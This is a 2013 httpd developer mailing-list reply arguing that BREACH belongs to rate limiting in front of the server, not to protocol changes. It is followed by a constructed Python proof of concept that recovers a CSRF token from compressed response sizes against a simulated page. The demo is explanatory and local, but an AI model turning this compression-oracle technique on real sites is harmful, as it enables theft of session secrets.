On 10.08.2013 21:28, Stefan Fritsch wrote:
> On Friday, 9 August 2013, 22:04:22 Joe Orton wrote:
>> On Fri, Aug 09, 2013 at 09:14:51AM -0700, Paul Querna wrote:
>>> In this case, I don't know if any of the proposed mitigations help;
>>> I'd love to have an easy way to validate that, so we could bring
>>> data to the discussion: If it increases the attack by multiple
>>> hours, and causes a <1% performance drop, isn't that the kind of
>>> thing that is useful?
>>
>> I sympathise with Stefan but I agree we should do something if we
>> can find something cheap, effective and reliable.
>
> Effective is difficult when done on the server. OTOH, browsers could
> just not send "Accept-Encoding: gzip" if a request is cross-domain and
> contains some sort of credentials (HTTP-auth, cookies with the
> 'secure' attribute, client certificate, ...). I think that would stop
> the vast majority of attack scenarios. I very much doubt that any
> measure at the server side can achieve a comparable level of
> protection.
IMHO that is all the wrong train. "victim's browser to visit the targeted website thousands of times" for me says clearly that a proper server with rate-controls based on iptables or a firewall in front of the machine would stop this, and honestly these days I would not connect any production server without rate-controls to the world wide web, so I am strictly against mangling the protocol and risking making mod_deflate less effective. Protections against such attacks do not belong in the application layer.

http://www.theregister.co.uk/2013/08/02/breach_crypto_attack/

>> The attacker's booby-trapped website hosts a script that runs the second
>> phase of the attack: this forces the victim's browser to visit the targeted
>> website thousands of times, over and over, each time appending a different
>> combination of extra data. When the attacker-controlled bytes match any
>> bytes originally encrypted in the stream, the browser's compression kicks
>> in and reduces the size of the transmission, a subtle change the eavesdropper
>> can detect
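The mechanism The Register describes above, as an added worked example for this page (it is not code from the httpd project or from any participant in the thread). Everything in it is constructed: the HTML page, the digit-only token `SECRET`, the `PREFIX` that precedes the token in the page, and a server that echoes the attacker's search string byte for byte. The "attacker" never sees plaintext, only the length of each compressed response, and uses BREACH's "two tries" trick (guess before a separator versus separator before guess) so that a correct digit shows up as a one-byte difference. Compression uses zlib's fixed Huffman tables (`Z_FIXED`) to make every byte count exact; a real server's dynamic tables add a few bits of noise per response, which attackers absorb by repeating measurements with varied padding.

```python
"""Compression-oracle demo of the BREACH mechanism quoted above.

Constructed example for this page, not code from the httpd project or from
anyone in the thread.  A tiny HTML page carries a secret CSRF token and echoes
an attacker-chosen search string; the "attacker" only sees how long the
compressed response is and recovers the token one digit at a time.
"""
import zlib

SECRET = "73914268"              # constructed token; digits only, all distinct
ALPHABET = "0123456789"          # the attacker's candidate set for each position
PREFIX = "account/logout?csrf="  # the 20 bytes that precede the token in the page
SEP = b"{"                       # a byte that occurs nowhere else in the page
LEVEL = 6                        # zlib's default compression level
# Fixed Huffman tables make every byte count below exact; Z_FIXED is 4 in zlib.h.
Z_FIXED = getattr(zlib, "Z_FIXED", 4)
Z_DYNAMIC = zlib.Z_DEFAULT_STRATEGY  # what a real server uses; adds per-response noise

# Constructed page: no digits and no "{" anywhere except the two placeholders.
PAGE = (
    b'<!doctype html>\n'
    b'<html><head><title>Account</title></head>\n'
    b'<body>\n'
    b'<nav><a href="/account">Account</a> '
    b'<a href="/account/logout?csrf=__SECRET__">Log out</a></nav>\n'
    b'<p>Your search for <em>__QUERY__</em> returned no matching transfers.</p>\n'
    b'<form method="post" action="/transfer">\n'
    b'<label>Recipient <input name="to"></label>\n'
    b'<label>Amount <input name="amount"></label>\n'
    b'<button>Send</button>\n'
    b'</form>\n'
    b'</body></html>\n'
)


def render(query: bytes) -> bytes:
    """Server side: the page with the secret and the echoed search string."""
    return PAGE.replace(b"__SECRET__", SECRET.encode()).replace(b"__QUERY__", query)


def compressed_size(body: bytes, strategy: int = Z_FIXED) -> int:
    """Network side: the only thing the eavesdropper learns per response."""
    z = zlib.compressobj(LEVEL, zlib.DEFLATED, zlib.MAX_WBITS,
                         zlib.DEF_MEM_LEVEL, strategy)
    return len(z.compress(body) + z.flush())


class Oracle:
    """The victim's browser, driven to fetch the page once per call."""

    def __init__(self, strategy: int = Z_FIXED):
        self.strategy = strategy
        self.requests = 0

    def size(self, query: bytes) -> int:
        self.requests += 1
        return compressed_size(render(query), self.strategy)


def two_tries_score(oracle: Oracle, known: str, guess: str) -> int:
    """BREACH's "two tries": echo PREFIX+known+SEP+guess and PREFIX+known+guess+SEP.

    A correct guess extends the LZ77 back-reference to the real token by one
    byte in the second variant only, so that response is one byte shorter; a
    wrong guess is emitted as a literal in both variants and scores 0.
    """
    base = (PREFIX + known).encode()
    g = guess.encode()
    return oracle.size(base + SEP + g) - oracle.size(base + g + SEP)


def recover_secret(strategy: int = Z_FIXED, length: int = len(SECRET)):
    """Recover the token digit by digit; returns (token, requests issued)."""
    oracle = Oracle(strategy)
    known = ""
    for _ in range(length):
        scores = {c: two_tries_score(oracle, known, c) for c in ALPHABET}
        known += max(scores, key=scores.get)
    return known, oracle.requests


if __name__ == "__main__":
    token, n = recover_secret()
    print(f"recovered {token!r} with {n} requests (real token: {SECRET!r})")
```

Two requests per candidate over a ten-digit alphabet recovers this eight-digit token in 160 requests; the same procedure against a 32-character base64 token costs 2 * 64 * 32 = 4096 requests, and the noise from dynamic Huffman tables multiplies that further, which is the "thousands of visits" a rate limit in front of the server would see. The oracle needs nothing from the application except that attacker-controlled bytes and the secret share one compressed response.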